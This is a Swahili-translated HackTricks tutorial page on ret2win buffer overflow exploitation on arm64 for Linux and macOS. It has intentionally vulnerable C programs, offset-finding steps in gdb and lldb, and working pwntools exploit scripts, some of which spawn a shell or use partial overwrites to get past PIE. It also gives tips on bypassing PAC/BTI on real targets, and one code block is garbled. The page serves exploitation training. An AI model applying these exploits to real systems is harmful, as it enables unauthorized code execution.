Ret2win - arm64

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Pata utangulizi kuhusu arm64 katika:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Jenga bila pie na canary:

clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
  • Bendera ya ziada -mbranch-protection=none inazima AArch64 Branch Protection (PAC/BTI). Ikiwa toolchain yako kwa chaguo-msingi inawasha PAC au BTI, hili linahakikisha maabara inaweza kurudiwa. Ili kukagua kama binary iliyotengenezwa inatumia PAC/BTI unaweza:
  • Tafuta AArch64 GNU properties:
  • readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'
  • Chunguza prologues/epilogues kwa paciasp/autiasp (PAC) au kwa bti c landing pads (BTI):
  • objdump -d ret2win | head -n 40

AArch64 calling convention — ukweli mfupi

  • Link register ni x30 (a.k.a. lr), na functions kwa kawaida huokoa x29/x30 kwa stp x29, x30, [sp, #-16]! na kuvirudisha kwa ldp x29, x30, [sp], #16; ret.
  • Hii ina maana anwani ya kurudisha iliyohifadhiwa iko kwenye sp+8 kuhusiana na msingi wa fremu. Ukiweka char buffer[64] chini yake, umbali wa kawaida wa kuziba hadi x30 iliyohifadhiwa ni 64 (buffer) + 8 (x29 iliyohifadhiwa) = 72 bytes — hasa kile tutakachokiona hapa chini.
  • Stack pointer lazima ibaki imepangwa kwa 16‑byte kwenye mipaka ya functions. Ukijenga ROP chains baadaye kwa matukio tata zaidi, hifadhi mlinganiko wa SP au unaweza kuanguka kwenye epilogues za function.

Kupata offset

Chaguo la pattern

Mfano huu ulitengenezwa kwa kutumia GEF:

Anzisha gdb na gef, tengeneza pattern na uitumie:

gdb -q ./ret2win
pattern create 200
run

arm64 itajaribu kurudi kwa anwani katika rejista x30 (iliyovamiwa), tunaweza kutumia hiyo kupata pattern offset:

pattern search $x30

Offset ni 72 (9x48).

Stack offset option

Anza kwa kupata stack address ambapo pc register imehifadhiwa:

gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame

Sasa weka breakpoint baada ya read() na endelea hadi read() itakapotekelezwa, kisha weka pattern kama 13371337:

b *vulnerable_function+28
c

Tafuta wapi muundo huu umehifadhiwa katika kumbukumbu:

Then: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72

Bila PIE

Kawaida

Pata anwani ya function win:

objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:

Exploit:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Off-by-1

Kwa kweli, hili litakuwa zaidi kama off-by-2 kwenye stored PC kwenye stack. Badala ya ku-overwrite return address yote, tuta-overwrite tu the last 2 bytes na 0x06c4.

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Unaweza kupata mfano mwingine wa off-by-one kwenye ARM64 katika https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, ambao ni off-by-one halisi katika udhaifu wa kubuniwa.

Na PIE

Tip

Kusanya binary bila kutumia hoja -no-pie

Off-by-2

Bila leak hatujui anwani halisi ya winning function, lakini tunaweza kujua offset ya function kutoka kwa binary; kwa kuwa return address tunayobadilisha tayari inaelekeza kwenye anwani iliyo karibu, inawezekana leak offset ya win function (0x7d4) katika kesi hii na kutumia offset hiyo tu:

```python from pwn import *

Configuration

binary_name = ‘./ret2win’ p = process(binary_name)

Prepare the payload

offset = 72 ret2win_addr = p16(0x07d4) payload = b’A’ * offset + ret2win_addr

Send the payload

p.send(payload)

Check response

print(p.recvline()) p.close()

## macOS

### Code
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

__attribute__((noinline))
void win(void) {
system("/bin/sh"); // <- **our target**
}

void vulnerable_function(void) {
char buffer[64];
// **BOF**: reading 256 bytes into a 64B stack buffer
read(STDIN_FILENO, buffer, 256);
}

int main(void) {
printf("win() is at %p\n", win);
vulnerable_function();
return 0;
}

Jenga bila canary (katika macOS huwezi kuzima PIE):

clang -o bof_macos bof_macos.c -fno-stack-protector -Wno-format-security

Endesha bila ASLR (ingawa tukiwa na address leak, hatuhitaji):

env DYLD_DISABLE_ASLR=1 ./bof_macos

Tip

Haiwezekani kuzima NX kwenye macOS kwa sababu kwenye arm64 hali hii imewekwa kwenye ngazi ya hardware, hivyo huwezi kuizima; kwa hiyo hautapata mifano za shellcode kwenye stack kwenye macOS.

Tafuta offset

  • Unda pattern:
python3 - << 'PY'
from pwn import *
print(cyclic(200).decode())
PY
  • Endesha programu na ingiza pattern ili kusababisha crash:
lldb ./bof_macos
(lldb) env DYLD_DISABLE_ASLR=1
(lldb) run
# paste the 200-byte cyclic string, press Enter
  • Angalia rejista x30 (anwani ya kurejea) ili kupata offset:
(lldb) register read x30
  • Tumia cyclic -l <value> ili kupata offset sahihi:
python3 - << 'PY'
from pwn import *
print(cyclic_find(0x61616173))
PY

# Replace 0x61616173 with the 4 first bytes from the value of x30
  • Hivyo ndivyo nilivyopata offset 72, kwa kuweka katika offset hiyo anwani ya win() unaweza kuitekeleza na kupata shell (inaendesha bila ASLR).

Exploit

#!/usr/bin/env python3
from pwn import *
import re

# Load the binary
binary_name = './bof_macos'

# Start the process
p = process(binary_name, env={"DYLD_DISABLE_ASLR": "1"})

# Read the address printed by the program
output = p.recvline().decode()
print(f"Received: {output.strip()}")

# Extract the win() address using regex
match = re.search(r'win\(\) is at (0x[0-9a-fA-F]+)', output)
if not match:
print("Failed to extract win() address")
p.close()
exit(1)

win_address = int(match.group(1), 16)
print(f"Extracted win() address: {hex(win_address)}")

# Offset calculation:
# Buffer starts at sp, return address at sp+0x40 (64 bytes)
# We need to fill 64 bytes, then overwrite the saved x29 (8 bytes), then x30 (8 bytes)
offset = 64 + 8  # 72 bytes total to reach the return address

# Craft the payload - ARM64 addresses are 8 bytes
payload = b'A' * offset + p64(win_address)
print(f"Payload length: {len(payload)}")

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

macOS - Mfano wa pili

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

__attribute__((noinline))
void leak_anchor(void) {
puts("leak_anchor reached");
}

__attribute__((noinline))
void win(void) {
puts("Killed it!");
system("/bin/sh");
exit(0);
}

__attribute__((noinline))
void vuln(void) {
char buf[64];
FILE *f = fopen("/tmp/exploit.txt", "rb");
if (!f) {
puts("[*] Please create /tmp/exploit.txt with your payload");
return;
}
// Vulnerability: no bounds check → stack overflow
fread(buf, 1, 512, f);
fclose(f);
printf("[*] Copied payload from /tmp/exploit.txt\n");
}

int main(void) {
// Unbuffered stdout so leaks are immediate
setvbuf(stdout, NULL, _IONBF, 0);

// Leak a different function, not main/win
printf("[*] LEAK (leak_anchor): %p\n", (void*)&leak_anchor);

// Sleep 3s
sleep(3);

vuln();
return 0;
}

Jenga bila canary (katika macOS huwezi kuzima PIE):

clang -o bof_macos bof_macos.c -fno-stack-protector -Wno-format-security

Tafuta offset

  • Tengeneza pattern katika faili /tmp/exploit.txt:
python3 - << 'PY'
from pwn import *
with open("/tmp/exploit.txt", "wb") as f:
f.write(cyclic(200))
PY
  • Endesha programu ili kusababisha crash:
lldb ./bof_macos
(lldb) run
  • Angalia register x30 (the return address) ili kupata offset:
(lldb) register read x30
  • Tumia cyclic -l <value> kupata offset sahihi:
python3 - << 'PY'
from pwn import *
print(cyclic_find(0x61616173))
PY
# Replace 0x61616173 with the 4 first bytes from the value of x30
  • Hivyo ndivyo nilivyopata offset 72. Kuweka katika offset hiyo anuani ya win() kunakuwezesha execute function hiyo na kupata shell (ikiendesha bila ASLR).

Hesabu anuani ya win()

  • Binary ni PIE; kwa kutumia leak ya leak_anchor() na kujua offset ya win() kutoka kwa leak_anchor() tunaweza kuhesabu anuani ya win().
objdump -d bof_macos | grep -E 'leak_anchor|win'

0000000100000460 <_leak_anchor>:
000000010000047c <_win>:
  • Offset ni 0x47c - 0x460 = 0x1c

Exploit

#!/usr/bin/env python3
from pwn import *
import re
import os

# Load the binary
binary_name = './bof_macos'
# Start the process
p = process(binary_name)

# Read the address printed by the program
output = p.recvline().decode()
print(f"Received: {output.strip()}")

# Extract the leak_anchor() address using regex
match = re.search(r'LEAK \(leak_anchor\): (0x[0-9a-fA-F]+)', output)
if not match:
print("Failed to extract leak_anchor() address")
p.close()
exit(1)
leak_anchor_address = int(match.group(1), 16)
print(f"Extracted leak_anchor() address: {hex(leak_anchor_address)}")

# Calculate win() address
win_address = leak_anchor_address + 0x1c
print(f"Calculated win() address: {hex(win_address)}")

# Offset calculation:
# Buffer starts at sp, return address at sp+0x40 (64 bytes)
# We need to fill 64 bytes, then overwrite the saved x29 (8 bytes), then x30 (8 bytes)
offset = 64 + 8  # 72 bytes total to reach the return address

# Craft the payload - ARM64 addresses are 8 bytes
payload = b'A' * offset + p64(win_address)
print(f"Payload length: {len(payload)}")

# Write the payload to /tmp/exploit.txt
with open("/tmp/exploit.txt", "wb") as f:
f.write(payload)

print("[*] Payload written to /tmp/exploit.txt")

# Drop to an interactive session
p.interactive()

Maelezo kuhusu hardening ya kisasa ya AArch64 (PAC/BTI) na ret2win

  • Ikiwa binary imejengwa kwa AArch64 Branch Protection, unaweza kuona paciasp/autiasp au bti c zikizalishwa katika function prologues/epilogues. Katika hali hiyo:
  • Kurudi kwa anwani ambayo si BTI landing pad halali kunaweza kusababisha SIGILL. Pendelea kulenga entry kamili ya function ambayo ina bti c.
  • Ikiwa PAC imewezeshwa kwa returns, naive return‑address overwrites yanaweza kushindwa kwa sababu epilogue inathibitisha x30. Kwa mazingira ya kujifunza, tengeneza tena kwa -mbranch-protection=none (imeonyeshwa hapo juu). Unaposhambulia malengo halisi, pendelea hijacks zisizo za return (mfano, function pointer overwrites) au tengeneza ROP ambayo haitatekeleza kamwe jozi ya autiasp/ret inayothibitisha LR uliyoibua.
  • Ili kuangalia sifa haraka:
  • readelf --notes -W ./ret2win na tazama AARCH64_FEATURE_1_BTI / AARCH64_FEATURE_1_PAC notes.
  • objdump -d ./ret2win | head -n 40 na angalia bti c, paciasp, autiasp.

Kukimbia kwenye non‑ARM64 hosts (qemu‑user quick tip)

Kama uko kwenye x86_64 lakini unataka kufanya mazoezi ya AArch64:

# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross

# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win

# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'

Kurasa za HackTricks zinazohusiana

Ret2syscall - arm64

Ret2lib + Printf leak - arm64

Marejeo

  • Kuwezesha PAC na BTI kwenye AArch64 kwa Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
  • Kiwango cha Miito ya Taratibu kwa Miundo ya Arm ya 64-bit (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks